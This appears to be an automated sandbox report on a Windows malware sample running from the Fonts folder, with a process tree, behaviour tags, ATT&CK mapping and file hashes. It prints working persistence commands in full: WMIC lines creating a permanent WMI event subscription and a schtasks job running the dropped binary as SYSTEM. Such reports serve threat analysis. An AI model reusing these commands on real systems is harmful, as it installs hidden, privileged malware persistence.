-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3916
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1604
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:3016
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:860
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:4060
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵PID:3976
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 85f86ffa5fae259e46e5da9cb8557268 uP+2Mq9UFkWBKF02dOV3EQ.0.1.0.0.01⤵PID:1184
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:2412
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:3704
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:1432
-
\??\c:\windows\fonts\upaxef\ulmad.exec:\windows\fonts\upaxef\ulmad.exe1⤵
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\TEMP\zsvgcfjo\vodije.exeC:\Windows\TEMP\zsvgcfjo\vodije.exe2⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3216
-
-
C:\Windows\SysWOW64\cmd.execmd /c wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="cxzrgqbe" DELETE & wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="hhsrdcij" DELETE & wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='cxzrgqbe'" DELETE2⤵
- System Location Discovery: System Language Discovery
PID:1788 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of SetWindowsHookEx
PID:768
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="cxzrgqbe" DELETE3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2940
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="hhsrdcij" DELETE3⤵
- System Location Discovery: System Language Discovery
PID:1524
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='cxzrgqbe'" DELETE3⤵
- System Location Discovery: System Language Discovery
PID:2660
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="cxzrgqbe", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 30 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'" & wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="hhsrdcij",CommandLineTemplate="c:\windows\ime\sdlibwve\bwicdl.exe" & wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="cxzrgqbe"", Consumer="CommandLineEventConsumer.Name="hhsrdcij""2⤵
- System Location Discovery: System Language Discovery
PID:2452 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of SetWindowsHookEx
PID:4092
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="cxzrgqbe", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 30 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1184
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="hhsrdcij",CommandLineTemplate="c:\windows\ime\sdlibwve\bwicdl.exe"3⤵
- System Location Discovery: System Language Discovery
PID:3716
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="cxzrgqbe"", Consumer="CommandLineEventConsumer.Name="hhsrdcij""3⤵
- System Location Discovery: System Language Discovery
PID:1988
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c schtasks /DELETE /TN jzevcefb /F2⤵
- Indicator Removal: Clear Persistence
- System Location Discovery: System Language Discovery
PID:4280 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4840
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /TN jzevcefb /F3⤵
- System Location Discovery: System Language Discovery
PID:1544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 30 /tn "jzevcefb" /ru system /tr "c:\windows\ime\sdlibwve\bwicdl.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4736 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of SetWindowsHookEx
PID:4724
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:184
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 30 /tn "jzevcefb" /ru system /tr "c:\windows\ime\sdlibwve\bwicdl.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:728
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c cmd /c powercfg -import c:\windows\fonts\upaxef\BestPower.pow2⤵
- Power Settings
- System Location Discovery: System Language Discovery
PID:4204 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of SetWindowsHookEx
PID:4828
-
-
C:\Windows\SysWOW64\cmd.execmd /c powercfg -import c:\windows\fonts\upaxef\BestPower.pow3⤵
- Power Settings
- System Location Discovery: System Language Discovery
PID:4140 -
C:\Windows\SysWOW64\powercfg.exepowercfg -import c:\windows\fonts\upaxef\BestPower.pow4⤵
- Power Settings
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3276
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c cmd /c powercfg -setactive e48f0ada-e2ac-4250-a97d-525b2c4e2d662⤵
- Power Settings
- System Location Discovery: System Language Discovery
PID:1128 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of SetWindowsHookEx
PID:3872
-
-
C:\Windows\SysWOW64\cmd.execmd /c powercfg -setactive e48f0ada-e2ac-4250-a97d-525b2c4e2d663⤵
- Power Settings
- System Location Discovery: System Language Discovery
PID:2204 -
C:\Windows\SysWOW64\powercfg.exepowercfg -setactive e48f0ada-e2ac-4250-a97d-525b2c4e2d664⤵
- Power Settings
PID:2756
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c powercfg -h off2⤵
- Power Settings
- System Location Discovery: System Language Discovery
PID:1108 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of SetWindowsHookEx
PID:1216
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg -h off3⤵
- Power Settings
- System Location Discovery: System Language Discovery
PID:2704
-
-
-
\??\c:\windows\fonts\hfedugey\emmwdz.exec:\windows\fonts\hfedugey\emmwdz.exe2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
PID:1612 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of SetWindowsHookEx
PID:3212
-
-
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:2552
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:620
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4508
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:5096 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 448 -p 2000 -ip 20002⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3656
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4328
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
PID:2264
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Event Triggered Execution
1Image File Execution Options Injection
1Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Event Triggered Execution
1Image File Execution Options Injection
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
39KB
MD5e9d79414b6ae0a9dc94cd8520ead6042
SHA1a25bd228235738ad821978325995b664501b6609
SHA2568f3e1666d48709dc8a162c446765bc2da04533e3e012211cabf75767e99e9d8e
SHA5125dda96fd9905c410966ad770b9764d8767cccf5a71f22b5c4959f6c66c08de0c5a9cd532b253ba675ca11cc3ae39b4c0f764958687eec95b55f325c8351e400f
-
Filesize
13KB
MD5eee99af377c0744df84f5d41569778df
SHA173c9d65e462197fff539709b7758c530086b5fdb
SHA256c9cef1316019605a5c3e504b3cb10310ef249f751676ddfb8045c13f9626e49d
SHA512ab0c5f6d2ec9b167403f8549d94abd9370a4123b9061b315a699d6daa61628add615f2530d0e51e5d8e008c13109f3c7018f92132e0873e94625c3927b44f413
-
Filesize
1.4MB
MD50c7bf3d7ed71381cbb708d7edf46228e
SHA13dc4cf3dd67a2b2e133a64f4cd747401b1fefbf7
SHA25682540f9c63f340faf7907902ef86f17b82be0e821a32345f30145f7ca0857673
SHA512c1190e305c223d327b04e2f3affb50a29c4de2aab31171c870e75bbf228939618afc8b183f913450b19adc0760c5e44cd83c49ac502e796ce6043f1a985b6739
-
Filesize
5.0MB
MD5a21272acff7b436d81a90fbc5f292d13
SHA1aea307f16647b9a7f4699c9f858776f28a764943
SHA25693832ea8737f780b89c3331ee578f423e974d8ff4176838aa80657dd77754bc4
SHA51292dabc098d22e6fff5569ad6a355388510dcbd374be88f6a764427aa3eda82cab486ba93fa7a5d5b6fd9d2d468f0cab59dd3236fdff020004fc4411255b2269f
-
Filesize
2KB
MD58abf2d6067c6f3191a015f84aa9b6efe
SHA198f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
-
Filesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
Filesize
2KB
MD5ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1a3879621f9493414d497ea6d70fbf17e283d5c08
SHA25698c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA5121eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
Filesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
Filesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
Filesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
539KB
MD5df008151b4971948436e5268cff97ca5
SHA13f287668a8c181823ae9401764a1fe1d1da07b1a
SHA256b94b8b8eae40283260bde8f72f34686b5cc4ff71b75106e9d8bec94fa4cb62ed
SHA5127cb585c612080e7caf29335b1258b9835893b32ee37fb108a2eac15ab96e984aadead86618e759a73433732c41f7768572b69e6b39d2c5902d55662f0d25034f
-
Filesize
2KB
MD5ecce6120db9ff559982def0e9d7cbf66
SHA10c34827d3824390f7dcb578cebd5c219d5075d91
SHA2567fd640a57b8539a90fa3ec5b4aeefe64416173c0438c64d0af46552f65c10f3b
SHA5125726a97b92150d9c61ba68c2ef5174b2f6f1adf25115ba07da8787bb12f6175f062cb16425b0a3ce0552005156dc2e2100d19d133e6e6c65aa20797e52077c4f